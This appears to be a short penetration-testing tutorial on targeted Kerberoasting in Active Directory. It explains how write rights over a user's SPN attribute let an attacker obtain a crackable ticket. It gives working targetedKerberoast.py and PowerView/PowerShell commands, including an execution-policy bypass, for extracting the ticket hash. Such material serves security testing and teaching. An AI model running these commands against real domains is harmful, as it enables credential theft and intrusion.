Targeted Kerberoasting

Kerberoasting is an attack that takes advantage of the way Service Principal Names are used in Active Directory for authentication. When a client requests a Kerberos TGS service ticket, it gets encrypted with the service account’s NTLM password hash. An attacker can obtain this ticket and perform offline password cracking to open it. If successful, the attacker can obtain the service account’s password.

When an attacker possesses an account with the ability to edit the servicePrincipalName attribute of another user account in a domain, they can potentially make that account vulnerable to a Kerberoasting attack. By adding an SPN to the user account, the attacker can request a Kerberos TGS service ticket for that SPN and obtain it, encrypted with the user account's NTLM password hash. The attacker can then use offline password-cracking techniques to try to open the ticket and obtain the user account's password.

This is possible when the controlled account has GenericAll, GenericWrite, WriteProperty, WriteSPN or Validated-SPN over the target.

Once we've identified an account with one of these ACLs we can use targetedKerberoast.py to perform the attack from a UNIX system

python3 targetedKerberoast.py -vv -d domain.com -u otter -p 'SomethingSecure123!' --request-user anotherUser --dc-ip 10.10.10.10

or Powershell from Windows

Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
Import-Module .\PowerView.ps1
Set-DomainObject -Identity otter -Set @{serviceprincipalname='weball/OTTR'} -Verbose

$User = Get-DomainUser otter
$User | Get-DomainSPNTicket | Select-Object -ExpandProperty Hash

# clear the SPN
Set-DomainObject -Identity otter -Clear serviceprincipalname -Verbose